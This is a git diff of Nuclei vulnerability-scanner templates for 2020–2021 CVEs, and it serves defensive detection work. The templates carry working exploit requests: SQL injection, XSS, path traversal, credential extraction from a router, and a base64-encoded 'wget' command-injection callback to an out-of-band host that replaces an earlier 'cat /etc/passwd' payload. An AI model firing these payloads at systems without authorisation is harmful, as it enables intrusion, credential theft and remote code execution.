+++ b/nuclei-templates/CVE-2020/cve-2020-9043.yaml @@ -1,26 +1,38 @@ id: CVE-2020-9043 info: - name: WordPress wpCentral < 1.5.1 - Improper Access Control to Privilege Escalation + name: WordPress wpCentral <1.5.1 - Information Disclosure author: scent2d severity: high description: | - The wpCentral plugin before 1.5.1 for WordPress allows disclosure of the connection key for Wordpress Admin Account. + WordPress wpCentral plugin before 1.5.1 is susceptible to information disclosure. An attacker can access the connection key for WordPress Admin account and thus potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the wpCentral plugin. + remediation: | + Update the wpCentral plugin to version 1.5.1 or later to fix the information disclosure vulnerability. reference: - https://wpscan.com/vulnerability/10074 - https://www.wordfence.com/blog/2020/02/vulnerability-in-wpcentral-plugin-leads-to-privilege-escalation/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9043 - https://wordpress.org/plugins/wp-central/#developers + - https://nvd.nist.gov/vuln/detail/CVE-2020-9043 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-9043 cwe-id: CWE-200 + epss-score: 0.04173 + epss-percentile: 0.91333 + cpe: cpe:2.3:a:wpcentral:wpcentral:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan,cve,cve2020 + verified: true + max-request: 4 + vendor: wpcentral + product: wpcentral + framework: wordpress + tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -28,27 +40,22 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/index.php HTTP/1.1 Host: {{Hostname}} - - | GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1 Host: {{Hostname}} - - | GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1 Host: {{Hostname}} host-redirects: true max-redirects: 2 - cookie-reuse: true - req-condition: true matchers: - type: dsl dsl: - - "contains(all_headers_4, 'text/html')" + - "contains(header_4, 'text/html')" - "status_code_4 == 200" - "contains(body_4, 'wpCentral Connection Key')" - contains(body_4, "pagenow = \'dashboard\'") @@ -57,16 +64,17 @@ requests: extractors: - type: regex name: authkey - part: body group: 1 regex: - 'style="word-wrap:break-word;">([a-z0-9]+)' internal: true + part: body - type: regex name: nonce - part: body group: 1 regex: - '_wpnonce=([0-9a-z]+)' internal: true + part: body +# digest: 490a0046304402204bffb24bf04e56aff7c5c70589b7ecbf9c04db1c030e793573251a9f104c2e1d02207a1cb6691600aaceae61e38e6ec3a9e54d43209ae9a6a254ab763e9a2b031198:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-9047.yaml b/nuclei-templates/CVE-2020/cve-2020-9047.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-9047.yaml rename to nuclei-templates/CVE-2020/cve-2020-9047.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-9402.yaml b/nuclei-templates/CVE-2020/cve-2020-9402.yaml new file mode 100644 index 0000000000..172130f2c4 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-9402.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-9402 + +info: + name: Django SQL Injection + description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL. + reference: + - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402 + - https://docs.djangoproject.com/en/3.0/releases/security/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-9402 + author: geeknik + severity: high + tags: cve,cve2020,django,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-9402 + cwe-id: CWE-89 + +requests: + - method: GET + path: + - "{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1" + + matchers: + - type: word + words: + - "DatabaseError at" + - "ORA-29257:" + - "ORA-06512:" + - "Request Method:" + condition: and diff --git a/nuclei-templates/CVE-2020/cve-2020-9496.yaml b/nuclei-templates/CVE-2020/cve-2020-9496.yaml new file mode 100644 index 0000000000..b07e38398a --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-9496.yaml @@ -0,0 +1,44 @@ +id: CVE-2020-9496 + +info: + name: Apache OFBiz XML-RPC Java Deserialization + author: dwisiswant0 + severity: medium + description: XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03 + tags: cve,cve2020,apache,java,ofbiz + reference: + - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html + - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html + - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-9496 + cwe-id: CWE-79,CWE-502 + +requests: + - raw: + - | + POST /webtools/control/xmlrpc HTTP/1.1 + Host: {{Hostname}} + Origin: http://{{Hostname}} + Content-Type: application/xml + + <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall> + + matchers-condition: and + matchers: + - type: word + words: + - "faultString" + - "No such service [ProjectDiscovery]" + - "methodResponse" + condition: and + part: body + - type: word + words: + - "Content-Type: text/xml" + part: header + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/CVE-20200924a.yaml b/nuclei-templates/CVE-2020/cve-20200924a.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-20200924a.yaml rename to nuclei-templates/CVE-2020/cve-20200924a.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-1472.yaml b/nuclei-templates/CVE-2021/CVE-2021-1472.yaml index 0ccc8974cd..83948913f4 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-1472.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-1472.yaml @@ -6,22 +6,33 @@ info: severity: critical description: | Cisco Small Business RV Series routers RV16X/RV26X versions 1.0.01.02 and before and RV34X versions 1.0.03.20 and before contain multiple OS command injection vulnerabilities in the web-based management interface. A remote attacker can execute arbitrary OS commands via the sessionid cookie or bypass authentication and upload files on an affected device. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected device. + remediation: | + Apply the latest security patches or firmware updates provided by Cisco to mitigate this vulnerability. reference: - https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/ - https://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2021-1472 - https://nvd.nist.gov/vuln/detail/CVE-2021-1473 + - http://seclists.org/fulldisclosure/2021/Apr/39 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-1472 - cwe-id: CWE-287 + cwe-id: CWE-287,CWE-119 + epss-score: 0.97174 + epss-percentile: 0.99793 + cpe: cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: cisco + product: rv160_firmware shodan-query: http.html:"Cisco rv340" - verified: "true" - tags: auth-bypass,injection,packetstorm,cve,cve2021,cisco,rce,intrusive + tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive -requests: +http: - raw: - | POST /upload HTTP/1.1 @@ -68,5 +79,4 @@ requests: part: body words: - '"jsonrpc":' - -# Enhanced by mp on 2022/10/06 +# digest: 4a0a0047304502207d2afae99f9b9e0f78952b1cccf9209e11e2cab61e200b590312046dcd5acbfd0221009ae723766dfe0df8dd26b8392a3a3c7a690658e170dc65292bdb3dbe49de9ace:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-1497.yaml b/nuclei-templates/CVE-2021/CVE-2021-1497.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-1497.yaml rename to nuclei-templates/CVE-2021/CVE-2021-1497.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-20038.yaml b/nuclei-templates/CVE-2021/CVE-2021-20038.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-20038.yaml rename to nuclei-templates/CVE-2021/CVE-2021-20038.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-20114.yaml b/nuclei-templates/CVE-2021/CVE-2021-20114.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-20114.yaml rename to nuclei-templates/CVE-2021/CVE-2021-20114.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-20150.yaml b/nuclei-templates/CVE-2021/CVE-2021-20150.yaml new file mode 100644 index 0000000000..c0f5c920cf --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-20150.yaml @@ -0,0 +1,65 @@ +id: CVE-2021-20150 + +info: + name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure + author: gy741 + severity: medium + description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page. + impact: | + An attacker can obtain sensitive credentials, leading to unauthorized access to the router. + remediation: | + Update the router firmware to the latest version to fix the vulnerability. + reference: + - https://www.tenable.com/security/research/tra-2021-54 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-20150 + cwe-id: CWE-306 + epss-score: 0.19434 + epss-percentile: 0.95837 + cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: trendnet + product: tew-827dru_firmware + shodan-query: http.html:"TEW-827DRU" + tags: cve2021,cve,disclosure,router,tenable,trendnet + +http: + - raw: + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + + action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'ftp_username' + - 'ftp_password' + - 'ftp_permission' + - 'TEW-827DRU' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + + extractors: + - type: regex + name: password + group: 1 + regex: + - '<input name="admin_passwd" type="password" id="admin_passwd" size="20" maxlength="15" value ="(.*)" />' + part: body +# digest: 4a0a00473045022020641e1868128b30593d1ddc725f1ed066daed96b21177490ee6e7659745b839022100ba439cd4360b3cedb6b422f6d08a9c25bae2c5d95591e97afcc0b9acd99d0bd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-20323.yaml b/nuclei-templates/CVE-2021/CVE-2021-20323.yaml index b83a77f07d..3f346d55d6 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-20323.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-20323.yaml @@ -2,10 +2,14 @@ id: CVE-2021-20323 info: name: Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting - author: ndmalc + author: ndmalc,incogbyte severity: medium description: | Keycloak 10.0.0 to 18.0.0 contains a cross-site scripting vulnerability via the client-registrations endpoint. On a POST request, the application does not sanitize an unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as HTML. This can be performed on any realm present on the Keycloak instance. Since the bug requires Content-Type application/json and is submitted via a POST, there is no common path to exploit that has a user impact. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade Keycloak to a version that is not affected by the vulnerability (10.0.1 or higher). reference: - https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j - https://bugzilla.redhat.com/show_bug.cgi?id=2013577 @@ -18,12 +22,18 @@ info: cvss-score: 6.1 cve-id: CVE-2021-20323 cwe-id: CWE-79 + epss-score: 0.00173 + epss-percentile: 0.53461 + cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 4 + vendor: redhat + product: keycloak shodan-query: html:"Keycloak" - verified: "true" - tags: cve,cve2021,keycloak,xss + tags: cve2021,cve,keycloak,xss,redhat -requests: +http: - method: POST path: - "{{BaseURL}}/auth/realms/master/clients-registrations/default" @@ -31,12 +41,12 @@ requests: - "{{BaseURL}}/realms/master/clients-registrations/default" - "{{BaseURL}}/realms/master/clients-registrations/openid-connect" + body: "{\"Test<img src=x onerror=alert(document.domain)>\":1}" + stop-at-first-match: true + headers: Content-Type: application/json - body: "{\"Test<img src=x onerror=alert(document.domain)>\":1}" - - stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -52,5 +62,4 @@ requests: - type: status status: - 400 - -# Enhanced by md on 2023/01/06 +# digest: 4a0a0047304502210094de0f55e8db0485dedb6be0b0faaa6737f8e5b40905c4c59b87598da6efa7c502203624957dc717497acf2a1ab8c0aee02060f4b9fc6fd22b24111abb850f2b07ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-20837.yaml b/nuclei-templates/CVE-2021/CVE-2021-20837.yaml index ab208a01bc..8433e63c9d 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-20837.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-20837.yaml @@ -1,42 +1,56 @@ id: CVE-2021-20837 info: - name: Movable Type XMLRPC API vulnerable to OS command injection - author: Min Won - description: Movable Type 7 r.5002 and earlier (Movable Type 7 Series), Movable Type 6.8.2 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. Note that all versions of Movable Type 4.0 or later including unsupported (End-of-Life, EOL) versions are also affected by this vulnerability. Crd --> Orginal Researcher.. - reference: https://nvd.nist.gov/vuln/detail/CVE-2021-20837 - severity: high - tags: cve,cve2021,rce + name: MovableType - Remote Command Injection + author: dhiyaneshDK,hackergautam + severity: critical + description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. + reference: + - https://nemesis.sh/posts/movable-type-0day/ + - https://github.com/ghost-nemesis/cve-2021-20837-poc + - https://twitter.com/cyber_advising/status/1454051725904580608 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20837 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-20837 + cwe-id: CWE-78 + tags: cve,cve2021,rce,movable requests: - raw: - | POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: POC - Accept: */* - Content-Length: 198 - Connection: close Content-Type: text/xml - + <?xml version="1.0" encoding="UTF-8"?> <methodCall> - <methodName>mt.handler_to_coderef</methodName> - <params> - <param> - <value> - <base64> - YGNhdCAvZXRjL3Bhc3N3ZGA= - </base64> - </value> - </param> - </params> + <methodName>mt.handler_to_coderef</methodName> + <params> + <param> + <value> + <base64> + {{base64("`wget http://{{interactsh-url}}`")}} + </base64> + </value> + </param> + </params> </methodCall> matchers-condition: and matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + words: + - "failed loading package" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/05 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21087.yaml b/nuclei-templates/CVE-2021/CVE-2021-21087.yaml index e93ec309db..d8102a7f67 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-21087.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-21087.yaml @@ -1,23 +1,37 @@ id: CVE-2021-21087 info: - name: Adobe ColdFusion - Remote Code Execution + name: Adobe ColdFusion - Cross-Site Scripting author: Daviey severity: medium - description: Adobe ColdFusion is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + description: | + Adobe Coldfusion versions 2016 (update 16 and earlier), 2018 (update 10 and earlier) and 2021.0.0.323925 are affected by an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. An attacker could abuse this vulnerability to execute arbitrary JavaScript code in context of the current user. Exploitation of this issue requires user interaction. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or updates provided by Adobe to mitigate this vulnerability. reference: - https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html - https://twitter.com/Daviey/status/1374070630283415558 + - https://nvd.nist.gov/vuln/detail/CVE-2021-21087 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-21087 cwe-id: CWE-79 + epss-score: 0.00186 + epss-percentile: 0.54967 + cpe: cpe:2.3:a:adobe:coldfusion:2016:-:*:*:*:*:*:* metadata: + max-request: 7 + vendor: adobe + product: coldfusion shodan-query: http.component:"Adobe ColdFusion" - tags: rce,adobe,misc,coldfusion + tags: cve2021,cve,xss,adobe,misc,coldfusion -requests: +http: - method: GET path: - "{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js" @@ -29,9 +43,9 @@ requests: - "{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js" stop-at-first-match: true + matchers-condition: and matchers: - - type: regex regex: - 'eval\(\"\(\"\+json\+\"\)\"\)' @@ -39,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by cs on 2022/10/10 +# digest: 4a0a00473045022100a8a85ba3feb3fc5625cd71d82087d10be42d642fd896fd5f96a35a9272ddff9402200a01ef82246294f6757e64c15356058aa6d3fc266364ca44ea705b2258a34ca5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-21311.yaml b/nuclei-templates/CVE-2021/CVE-2021-21311.yaml new file mode 100644 index 0000000000..deec236dce --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-21311.yaml @@ -0,0 +1,69 @@ +id: CVE-2021-21311 + +info: + name: Adminer <4.7.9 - Server-Side Request Forgery + author: Adam Crosser,pwnhxl + severity: high + description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to internal resources and potential data leakage. + remediation: Upgrade to version 4.7.9 or later. + reference: + - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 + - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf + - https://packagist.org/packages/vrana/adminer + - https://nvd.nist.gov/vuln/detail/CVE-2021-21311 + - https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2021-21311 + cwe-id: CWE-918 + epss-score: 0.01485 + epss-percentile: 0.85417 + cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* + metadata: + max-request: 6 + vendor: adminer + product: adminer + shodan-query: title:"Login - Adminer" + fofa-query: app="Adminer" && body="4.7.8" + hunter-query: app.name="Adminer"&&web.body="4.7.8" + tags: cve2021,cve,adminer,ssrf + +http: + - raw: + - | + POST {{path}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}} + + payloads: + path: + - "/index.php" + - "/adminer.php" + - "/adminer/adminer.php" + - "/adminer/index.php" + - "/_adminer.php" + - "/_adminer/index.php" + + attack: batteringram + stop-at-first-match: true + redirects: true + max-redirects: 1 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>400 - Bad Request" + - "<title>400 - Bad Request</title>" + condition: or + + - type: status + status: + - 403 +# digest: 4a0a0047304502204671bff084169fc348f8c4837b6a81b74f49e87909f1e780a61bd35749ea8a16022100b98866077226246c174b2cb21ee40adccb717dcf57821c10b00a84b00c03df16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-21345.yaml b/nuclei-templates/CVE-2021/CVE-2021-21345.yaml index b21c3a55cb..b56b65a5f9 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-21345.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-21345.yaml @@ -6,21 +6,28 @@ info: severity: critical description: | XStream before 1.4.16 is susceptible to remote code execution. An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. + remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework. reference: - https://x-stream.github.io/CVE-2021-21345.html - http://x-stream.github.io/changes.html#1.4.16 - https://github.com/x-stream/xstream/security/advisories/GHSA-hwpc-8xqv-jvj4 - https://nvd.nist.gov/vuln/detail/CVE-2021-21345 - remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework. + - https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2021-21345 - cwe-id: CWE-78 - epss-score: 0.46618 - tags: cve,cve2021,xstream,deserialization,rce,oast + cwe-id: CWE-78,CWE-502 + epss-score: 0.4876 + epss-percentile: 0.9721 + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xstream_project + product: xstream + tags: cve2021,cve,xstream,deserialization,rce,oast,xstream_project http: - raw: @@ -100,3 +107,4 @@ http: part: interactsh_request words: - "User-Agent: curl" +# digest: 4a0a00473045022100c57ea9d8cecf995608fe7d5b0128a9e6783b30e14e86bd3ba5820cc61fb13e5c02204144080c1e53f2cbea11cc5770c68b6014c15e5d0215a769eadff83ae34e16d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-21351.yaml b/nuclei-templates/CVE-2021/CVE-2021-21351.yaml index 23ba882fec..307176ac75 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-21351.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-21351.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | XStream before 1.4.16 is susceptible to remote code execution. An attacker can load and execute arbitrary code from a remote host via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework. reference: - https://github.com/vulhub/vulhub/tree/master/xstream/CVE-2021-21351 @@ -18,14 +20,14 @@ info: cvss-score: 9.1 cve-id: CVE-2021-21351 cwe-id: CWE-434 - epss-score: 0.77865 - epss-percentile: 0.97926 + epss-score: 0.73084 + epss-percentile: 0.98014 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2021,xstream,deserialization,rce,oast,vulhub + tags: cve2021,cve,xstream,deserialization,rce,oast,vulhub,xstream_project http: - raw: @@ -131,4 +133,4 @@ http: - type: status status: - 500 -# digest: 490a0046304402200f0d1166e2cddb880091408a91aed9caf6fb05640fd06b1629e2842f7ab9a8ce022014f8f72bd15bd1f23f94e91f1acd63412bc5e52f76ff30b984e867e46ffb7804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f29c7be274baa128b1b19d0598c8a3d7805a5f14b3073a1aa9d6dae05ad2a533022100a39cddf06232b2de875c43c80596a232347000e49418a3f927b430ed8c8abbfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-21402.yaml b/nuclei-templates/CVE-2021/CVE-2021-21402.yaml deleted file mode 100644 index e1e590895c..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21402.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2021-21402 -info: - name: Jellyfin prior to 10.7.0 Unauthenticated Arbitrary File Read - author: dwisiswant0 - severity: medium - description: | - Jellyfin allows unauthenticated arbitrary file read. This issue is more prevalent when - Windows is used as the host OS. Servers that are exposed to the public Internet are - potentially at risk. This is fixed in version 10.7.1. - reference: - - https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/ - - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-wg4c-c9g9-rxhx - - https://github.com/jellyfin/jellyfin/releases/tag/v10.7.1 - - https://github.com/jellyfin/jellyfin/commit/0183ef8e89195f420c48d2600bc0b72f6d3a7fd7 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 - cve-id: CVE-2021-21402 - cwe-id: CWE-22 - metadata: - fofa-query: title="Jellyfin" || body="http://jellyfin.media" - shodan-query: http.html:"Jellyfin" - verified: true - tags: cve,cve2021,jellyfin,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/" - - "{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "Content-Type: application/octet-stream" - part: header - - type: regex - regex: - - "\\[(font|extension|file)s\\]" - part: body diff --git a/nuclei-templates/CVE-2021/CVE-2021-21799.yaml b/nuclei-templates/CVE-2021/CVE-2021-21799.yaml index 3c93d2ef05..44d996dca0 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-21799.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-21799.yaml @@ -1,13 +1,13 @@ id: CVE-2021-21799 - info: - name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting + name: Advantech R-SeeNet v 2.4.12 - Cross Site Scripting author: arafatansari severity: medium description: | - Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality. + Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the telnet_form.php script functionality. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21799 - https://nvd.nist.gov/vuln/detail/CVE-2021-21799 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N @@ -18,26 +18,20 @@ info: shodan-query: http.html:"R-SeeNet" verified: "true" tags: cve,cve2021,xss,r-seenet - requests: - method: GET path: - "{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E" - matchers-condition: and matchers: - type: word part: body words: - "Telnet " - - type: word part: header words: - "text/html" - - type: status status: - 200 - -# Enhanced by mp on 2022/09/02 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21800.yaml b/nuclei-templates/CVE-2021/CVE-2021-21800.yaml deleted file mode 100644 index ad5eb3b23d..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21800.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2021-21800 - -info: - name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the ssh_form.php script functionality. - reference: - - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1271 - - https://nvd.nist.gov/vuln/detail/CVE-2021-21800 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-21800 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"R-SeeNet" - 